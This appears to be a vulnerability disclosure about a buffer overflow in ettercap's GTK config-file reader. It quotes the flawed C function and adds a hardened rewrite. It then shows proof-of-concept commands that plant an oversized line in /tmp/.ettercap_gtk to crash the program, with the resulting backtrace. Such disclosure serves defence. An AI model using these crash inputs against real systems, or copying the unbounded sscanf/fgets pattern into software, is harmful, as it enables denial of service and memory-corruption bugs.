Indeed, looking at the source in ettercap_ng/src/interfaces/gtk/ec_gtk_conf.c, there is a function named gtkui_conf_read() which never tests the return code of sscanf(), so a buffer overflow can be achieved here.
/* filename is declared at file scope in ec_gtk_conf.c (not shown here) */
void gtkui_conf_read(void) {
    FILE *fd;
    char *path;
    char line[50], name[30];   /* line is 50 bytes, but fgets() below is told 100 */
    short value;
#ifdef OS_WINDOWS
    path = ec_win_get_user_dir();
#else
    /* TODO: get the dropped privs home dir instead of "/root" */
    /* path = g_get_home_dir(); */
    path = g_get_tmp_dir();
#endif
    filename = g_build_filename(path, ".ettercap_gtk", NULL);
    DEBUG_MSG("gtkui_conf_read: %s", filename);
    fd = fopen(filename, "r");
    if(!fd)
        return;
    while(fgets(line, 100, fd)) {
        /* %s has no field width: a name longer than 29 chars overruns name[] */
        sscanf(line, "%s = %hd", name, &value);
        gtkui_conf_set(name, value);
    }
    fclose(fd);
}
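For comparison, here is a hardened reader for the same "name = value" format. This is an added example, not ettercap's own code or its later fix: the function names (conf_parse_line, conf_read_stream, demo_constructed_file) and the two buffer sizes are assumptions, and the sample file it parses is constructed inline. It keeps fgets() bound to sizeof(line), drops lines longer than the buffer, checks a name's length before copying it, and range-checks the value with strtol() instead of an unchecked %hd.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CONF_LINE_MAX 100   /* line buffer size; fgets() is always told this size */
#define CONF_NAME_MAX 30    /* name buffer size, same as the original name[30] */

enum { CONF_OK = 0, CONF_SKIP = 1, CONF_BAD = -1 };

/* Parse one "name = value" line. name receives at most CONF_NAME_MAX-1 chars
 * plus NUL. Returns CONF_OK, CONF_SKIP (blank line or comment) or CONF_BAD
 * (malformed, oversized name, value outside short range, trailing junk). */
int conf_parse_line(const char *line, char name[CONF_NAME_MAX], short *value)
{
    const char *p = line;
    char *end;
    size_t n;
    long v;

    while (*p == ' ' || *p == '\t') p++;
    if (*p == '\0' || *p == '\n' || *p == '\r' || *p == '#') return CONF_SKIP;

    /* name = run of chars up to '=' or whitespace; check the length BEFORE copying */
    n = strcspn(p, "= \t\r\n");
    if (n == 0 || n >= CONF_NAME_MAX) return CONF_BAD;
    memcpy(name, p, n);
    name[n] = '\0';
    p += n;

    while (*p == ' ' || *p == '\t') p++;
    if (*p++ != '=') return CONF_BAD;

    errno = 0;
    v = strtol(p, &end, 10);   /* strtol() skips leading whitespace itself */
    if (end == p || errno != 0 || v < SHRT_MIN || v > SHRT_MAX) return CONF_BAD;

    for (p = end; *p == ' ' || *p == '\t' || *p == '\r' || *p == '\n'; p++) ;
    if (*p != '\0') return CONF_BAD;   /* trailing junk after the number */

    *value = (short)v;
    return CONF_OK;
}

/* Scratch result of the last parse, so callers can inspect name and value. */
static char parsed_name[CONF_NAME_MAX];
static short parsed_value;

int parse_line_status(const char *line)
{
    return conf_parse_line(line, parsed_name, &parsed_value);
}

/* Read settings from an open stream with a bounded fgets(); each accepted
 * (name, value) pair is handed to set(). Returns the number accepted. */
int conf_read_stream(FILE *fd, void (*set)(const char *, short))
{
    char line[CONF_LINE_MAX];
    char name[CONF_NAME_MAX];
    short value;
    int accepted = 0;

    while (fgets(line, sizeof line, fd)) {   /* sizeof line, never a literal */
        size_t len = strlen(line);
        if (len == sizeof line - 1 && line[len - 1] != '\n') {
            /* physical line longer than the buffer: discard the rest and skip it */
            int c;
            while ((c = fgetc(fd)) != EOF && c != '\n') ;
            continue;
        }
        if (conf_parse_line(line, name, &value) == CONF_OK) {
            set(name, value);
            accepted++;
        }
    }
    return accepted;
}

/* Records the last accepted setting so the demo result can be checked. */
static char last_name[CONF_NAME_MAX];
static short last_value;

static void record_setting(const char *name, short value)
{
    snprintf(last_name, sizeof last_name, "%s", name);
    last_value = value;
}

/* Constructed sample file (hypothetical content): a comment, the over-long
 * name from the post, a 500-byte line of 'A', a malformed line and one good
 * setting. Returns the number of accepted lines (expected: 1). */
int demo_constructed_file(void)
{
    FILE *fd = tmpfile();
    int i, accepted;
    if (!fd) return -1;
    fputs("# constructed .ettercap_gtk sample\n", fd);
    fputs("ettercap_super_option_to_crash_because_its_over_thirty_chars = 42\n", fd);
    for (i = 0; i < 500; i++) fputc('A', fd);
    fputc('\n', fd);
    fputs("broken line without equals\n", fd);
    fputs("window_width = 640\n", fd);
    rewind(fd);
    accepted = conf_read_stream(fd, record_setting);
    fclose(fd);
    return accepted;
}

int main(void)
{
    int n = demo_constructed_file();
    printf("accepted %d setting(s); last = %s -> %d\n", n, last_name, last_value);
    return n == 1 ? 0 : 1;
}
```

The two lines from the post (the sixty-character option name and the 500 'A's) are both rejected before anything is copied: the first fails the length check on the name, the second is dropped by the truncation check after fgets() fills the buffer without seeing a newline.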
This function also never checks that the .ettercap_gtk file content is well-formed, so the overflow can be triggered in different ways.
$ cat>/tmp/.ettercap_gtk
ettercap_super_option_to_crash_because_its_over_thirty_chars = 42
^D
$ ettercap -G
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Dissector "dns" not supported (etter.conf line 70)
*** buffer overflow detected ***: ettercap terminated
======= Backtrace: =========
/lib/libc.so.6(__fortify_fail+0x37)[0x7fe1f4e8e237]
/lib/libc.so.6(+0xfe0f0)[0x7fe1f4e8d0f0]
/lib/libc.so.6(__fgets_chk+0x159)[0x7fe1f4e8d459]
ettercap(gtkui_conf_read+0x97)[0x45f4e7]
ettercap[0x454c2f]
ettercap(ui_init+0x19)[0x42d2f9]
ettercap(main+0x3ca)[0x41ff0a]
/lib/libc.so.6(__libc_start_main+0xfd)[0x7fe1f4dadc4d]
ettercap[0x414509]
======= Memory map: ========
00400000-00475000 r-xp 00000000 08:05 8396 /usr/sbin/ettercap
00674000-00675000 r--p 00074000 08:05 8396 /usr/sbin/ettercap
00675000-00678000 rw-p 00075000 08:05 8396 /usr/sbin/ettercap
00678000-00685000 rw-p 00000000 00:00 0
00a72000-00b18000 rw-p 00000000 00:00 0 [heap]
...
or, in a more basic way:
$ python -c 'print "A"*500' > /tmp/.ettercap_gtk && ettercap -G
*** buffer overflow detected ***: ettercap terminated
I found this one on Launchpad, reported by Dan Rosenberg.